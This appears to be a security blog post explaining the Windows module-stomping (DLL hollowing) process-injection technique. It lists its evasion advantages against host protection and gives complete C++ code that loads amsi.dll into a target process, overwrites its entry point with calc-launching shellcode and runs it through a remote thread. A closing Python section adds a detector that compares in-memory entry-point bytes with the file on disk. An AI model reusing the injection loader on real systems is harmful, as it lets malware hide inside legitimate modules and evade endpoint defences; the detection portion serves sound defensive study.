
Injection: Module Stomping Injection

Posted: 2023-01-03 22:56:02

Module Stomping Injection

Module Stomping (also called Module Overloading or DLL Hollowing)

How it works: inject a legitimate DLL into the target process, locate that DLL's AddressOfEntryPoint, overwrite the bytes at AddressOfEntryPoint with shellcode, then create a new thread in the target process that starts at the DLL's entry point.

Advantages:

1. No RWX memory page needs to be allocated and no page permissions need to be changed.

2. The DLL that gets injected is a legitimate one rather than a malicious DLL, so the injection is not caught by host-protection checks on paths such as C:\temp\.

3. The remote thread that runs the shellcode is associated with a legitimate Windows module, so its suspicion score is lower.

Disadvantage:

1. ReadProcessMemory and WriteProcessMemory are sensitive, closely monitored API calls.

#include <iostream>
#include <string>
#include <Windows.h>
#include <psapi.h>

int main(int argc, char* argv[])
{
	HANDLE processHandle;
	PVOID remoteBuffer;
	wchar_t moduleToInject[] = L"C:\\windows\\system32\\amsi.dll";
	HMODULE modules[256] = {};
	SIZE_T modulesSize = sizeof(modules);
	DWORD modulesSizeNeeded = 0;
	DWORD moduleNameSize = 0;
	SIZE_T modulesCount = 0;
	CHAR remoteModuleName[128] = {};
	HMODULE remoteModule = NULL;

	// x86 shellcode that launches calc.exe (the payload ends with the string "calc.exe")
	unsigned char shellcode[] = {
		0xFC, 0xE8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xE5, 0x31, 0xC0, 0x64, 0x8B, 0x50, 0x30, 0x8B,
		0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 0x0F, 0xB7, 0x4A, 0x26, 0x31, 0xFF, 0xAC, 0x3C,
		0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF2, 0x52, 0x57, 0x8B, 0x52,
		0x10, 0x8B, 0x4A, 0x3C, 0x8B, 0x4C, 0x11, 0x78, 0xE3, 0x48, 0x01, 0xD1, 0x51, 0x8B, 0x59, 0x20,
		0x01, 0xD3, 0x8B, 0x49, 0x18, 0xE3, 0x3A, 0x49, 0x8B, 0x34, 0x8B, 0x01, 0xD6, 0x31, 0xFF, 0xAC,
		0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0x38, 0xE0, 0x75, 0xF6, 0x03, 0x7D, 0xF8, 0x3B, 0x7D, 0x24, 0x75,
		0xE4, 0x58, 0x8B, 0x58, 0x24, 0x01, 0xD3, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 0x58, 0x1C, 0x01, 0xD3,
		0x8B, 0x04, 0x8B, 0x01, 0xD0, 0x89, 0x44, 0x24, 0x24, 0x5B, 0x5B, 0x61, 0x59, 0x5A, 0x51, 0xFF,
		0xE0, 0x5F, 0x5F, 0x5A, 0x8B, 0x12, 0xEB, 0x8D, 0x5D, 0x6A, 0x01, 0x8D, 0x85, 0xB2, 0x00, 0x00,
		0x00, 0x50, 0x68, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x68, 0xA6,
		0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,
		0x13, 0x72, 0x6F, 0x6A, 0x00, 0x53, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65,
		0x00
	};

	// inject a benign DLL into remote process
	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
	//processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 8444);

	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof moduleToInject, MEM_COMMIT, PAGE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)moduleToInject, sizeof moduleToInject, NULL);
	PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
	HANDLE dllThread = CreateRemoteThread(processHandle, NULL, 0, threadRoutine, remoteBuffer, 0, NULL);
	WaitForSingleObject(dllThread, 1000);

	// find base address of the injected benign DLL in remote process
	EnumProcessModules(processHandle, modules, modulesSize, &modulesSizeNeeded);
	modulesCount = modulesSizeNeeded / sizeof(HMODULE);
	for (size_t i = 0; i < modulesCount; i++)
	{
		remoteModule = modules[i];
		GetModuleBaseNameA(processHandle, remoteModule, remoteModuleName, sizeof(remoteModuleName));
		if (std::string(remoteModuleName).compare("amsi.dll") == 0)
		{
			std::cout << remoteModuleName << " at " << modules[i];
			break;
		}
	}

	// get DLL's AddressOfEntryPoint
	DWORD headerBufferSize = 0x1000;
	LPVOID targetProcessHeaderBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, headerBufferSize);
	ReadProcessMemory(processHandle, remoteModule, targetProcessHeaderBuffer, headerBufferSize, NULL);

	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetProcessHeaderBuffer;
	PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)targetProcessHeaderBuffer + dosHeader->e_lfanew);
	LPVOID dllEntryPoint = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)remoteModule);
	std::cout << ", entryPoint at " << dllEntryPoint;

	// write shellcode to DLL's AddressofEntryPoint
	WriteProcessMemory(processHandle, dllEntryPoint, (LPCVOID)shellcode, sizeof(shellcode), NULL);

	// execute shellcode from inside the benign DLL
	CreateRemoteThread(processHandle, NULL, 0, (PTHREAD_START_ROUTINE)dllEntryPoint, NULL, 0, NULL);

	return 0;
}
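A defender-side counterpart, added here as an example and not part of the original post: it walks the PE headers the same way the code above does (e_lfanew, then IMAGE_NT_HEADERS, then OptionalHeader.AddressOfEntryPoint), maps the entry-point RVA back to a file offset through the section table, and compares the bytes at the entry point of a module as mapped in a process with the same bytes from the module's file on disk. A mismatch at the entry point is exactly the footprint this technique leaves. The PE image, its section contents and the simulated overwrite are all constructed for the example; they are not a real DLL and not the post's shellcode.

```python
"""Entry-point integrity check against module stomping.

Added example (not code from the original post).  The PE image built in
build_sample_images() is constructed by hand and is not a real DLL.
"""
import struct

PE_SIGNATURE = b"PE\0\0"


def entry_point_rva(image: bytes) -> int:
    """Return OptionalHeader.AddressOfEntryPoint (an RVA) from a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20              # IMAGE_FILE_HEADER is 20 bytes
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):      # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # AddressOfEntryPoint sits at offset 16 of the optional header in both formats.
    (rva,) = struct.unpack_from("<I", image, opt + 16)
    return rva


def rva_to_file_offset(disk_image: bytes, rva: int) -> int:
    """Map an RVA to a file offset using the section table of the on-disk image."""
    (e_lfanew,) = struct.unpack_from("<I", disk_image, 0x3C)
    (num_sections,) = struct.unpack_from("<H", disk_image, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", disk_image, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size     # section headers follow the optional header
    for i in range(num_sections):
        hdr = table + 40 * i             # IMAGE_SECTION_HEADER is 40 bytes
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", disk_image, hdr + 8)
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%X is not inside any section" % rva)


def entry_point_stomped(memory_image: bytes, disk_image: bytes, window: int = 32) -> bool:
    """True when the entry-point bytes in memory no longer match the file on disk.

    memory_image is the module as read out of the target process (base-relative),
    disk_image is the module's file.  Legitimate inline hooks can also differ here,
    so treat a mismatch as a lead to triage rather than a verdict.
    """
    rva = entry_point_rva(memory_image)
    if rva != entry_point_rva(disk_image):
        return True                      # the header itself was altered
    file_off = rva_to_file_offset(disk_image, rva)
    return memory_image[rva:rva + window] != disk_image[file_off:file_off + window]


def build_sample_images():
    """Construct a minimal PE32+ DLL image with one .text section.

    Returns (memory_image, disk_image).  Constructed sample data: the section
    holds a harmless prologue, not code from any real module.
    """
    entry_rva, text_va, text_raw, text_size = 0x1010, 0x1000, 0x200, 0x200
    text = bytearray(text_size)
    text[entry_rva - text_va:entry_rva - text_va + 4] = b"\x48\x83\xEC\x28"  # sub rsp, 0x28
    text[entry_rva - text_va + 4] = 0xC3                                    # ret

    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                                # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)
    opt_hdr = struct.pack("<HBBIIII", 0x20B, 14, 0, text_size, 0, 0, entry_rva).ljust(240, b"\0")
    section = struct.pack("<8sIIIIIIHHI", b".text", text_size, text_va, text_size,
                          text_raw, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + PE_SIGNATURE + file_hdr + opt_hdr + section).ljust(text_raw, b"\0")

    disk_image = headers + bytes(text)                    # file layout
    memory_image = headers.ljust(text_va, b"\0") + bytes(text)  # section-aligned layout
    return memory_image, disk_image


def simulate_stomp(memory_image: bytes) -> bytes:
    """Overwrite the entry point in a copy of the memory image with int3 filler.

    Stands in for the WriteProcessMemory step of the technique so the check can
    be exercised offline; constructed filler, not a payload.
    """
    patched = bytearray(memory_image)
    rva = entry_point_rva(patched)
    patched[rva:rva + 16] = b"\xCC" * 16
    return bytes(patched)


if __name__ == "__main__":
    mem, disk = build_sample_images()
    print("entry point RVA: 0x%X" % entry_point_rva(mem))
    print("clean module stomped?  ", entry_point_stomped(mem, disk))
    print("patched module stomped?", entry_point_stomped(simulate_stomp(mem), disk))
```

In a real sweep the memory image would come from a ReadProcessMemory call or a process dump and the disk image from the module's path on disk; the same comparison can be extended from the entry point to the whole .text section to catch overwrites placed elsewhere in the module.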


Source: https://www.cnblogs.com/wuruixin/p/17023615.html
